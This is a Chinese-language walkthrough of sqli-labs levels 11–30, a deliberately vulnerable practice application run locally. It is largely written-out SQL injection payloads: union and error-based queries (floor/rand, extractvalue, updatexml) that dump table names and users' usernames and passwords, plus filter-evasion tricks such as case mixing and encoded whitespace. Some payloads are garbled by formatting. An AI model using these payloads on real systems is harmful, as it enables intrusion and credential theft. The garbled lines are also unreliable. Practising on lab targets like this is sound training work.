11-30

Less-11
本关为post传递,我们先输入密码和账号:admin’ 123 发现本关为单引号闭合
接着输入账号与密码admin’# 123 发现有两个显示位面(在post参数传递的时候 注释必须使用#其他注释符不生效)接下来采用union注入
数据库名:Username:0admin’ union select 1,database()# Password:随便输
查询数据表:Username:0admin’ union select (select group_concat(table_name) from information_schema.tables where table_schema=‘security’),2#
查询字段:Username:0admin’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’)#
查询数据:Username:0admin’ union select (select group_concat(username) from security.users),(select group_concat(password) from security.users)#
Less-12
判断闭合方式为”)闭合,其余见Less-11
Less-13
数据库:0admin’) union select count(),concat(’~’,(select database() ), ‘~’ ,floor(rand(0) 2 ) ) as a from information_schema.tables group by a#
数据表:0admin’) union select count(), concat(’~’,(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),’~’,floor(rand(0)2)) as a from information_schema.tables group by a#
列名:0admin’) union select count(),concat(’~’,(select column_name from information_schema.columns where table_name=‘users’ limit 1,1),’~’,floor(rand()2)) as a from information_schema.tables group by a#
用户名:0admin’) union select count(),concat(’~’,(select concat_ws(’[’,password,username) from users limit 1,1),’~’,floor(rand()*2)) as a from information_schema.tables group by a#
Less-14
闭合方式为”闭合,其余同Less-13
Less-15
闭合方式为’闭合
Less-16
闭合方式为”闭合
Less-17
Username=admin or 1=1#Password=1’出现报错
尝试报错类型的注入Username=adminPassword=11’and extractvalue(1,concat(0x7e,(select @@version),0x7e))#⊂ mit=Submit将@@version 换成子句即可进行其他的注入Less-18
抓掉一大包头发也没学会的抓包
Less-19
本关跳过
Less-20
本关跳过
Less-21
本关跳过
Less-22
本关跳过【看到大家都跳到这里我就放心了】
Less-23
转战源代码了,发现#,-- 都被过滤掉了,构造sql语句:SELECT * FROM users WHEREid=’-1’ union select 1,@@datadir,’3’ limit 0,1 接下来联合注入
数据库http://127.0.0.1/sqli-labs/less-23//index.php?id=-1%27union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),%273
数据表http://127.0.0.1/sqli-labs/Less-23/index.php?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),%273
用户名index.php?id=-1’union select 1,(select group_concat(username) from security.users limit 0,1),‘3
Less-24
居然改页面了害
创号admin ‘#,然后登陆并修改密码,修改的就是admin的密码
Less-25
本关主要为 or and 过滤,绕过 or 和 and 过滤有以下方法:(1)大小写变形 Or,OR,oR(2)编码,hex,urlencode(3)添加注释/or/(4)利用符号 and=&& or=||尝试报错注入:Index.php?id=1’|| extractvalue(1,concat(0x7e,database()))–+数据库?id=-1’ union select 1,(select group_concat(username) from users), (select group_concat(passwoorrd) from users)–+
Less-26
这一关东西少的有点多,注释,空格还有or ,and
空格绕过方法总结:
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格注释符绕过方法: 在查询语句后加一个||‘1 通过or’1 来闭合语句最后一个单引号。绕不过去,报错注入。用updatexml注入
查询本地数据库:/?id=1’||updatexml(1,concat(’%’,(database()),’%’),1)||'1
Less-27
过滤的有注释,空格,union select,空格用%0a代替
数据库:?id=0’UnioN%0aSeLeCT%0a1,2,3||‘1
Less-28
闭合方式为单引号闭合
数据库:/?id=0’)%0Aunion%0aUnIon%0a%0aseLECtselect%0a1,(select%0adatabase()),3||('1
Less-29同Less-1
Less-30
双引号闭合

你可能感兴趣的:(笔记)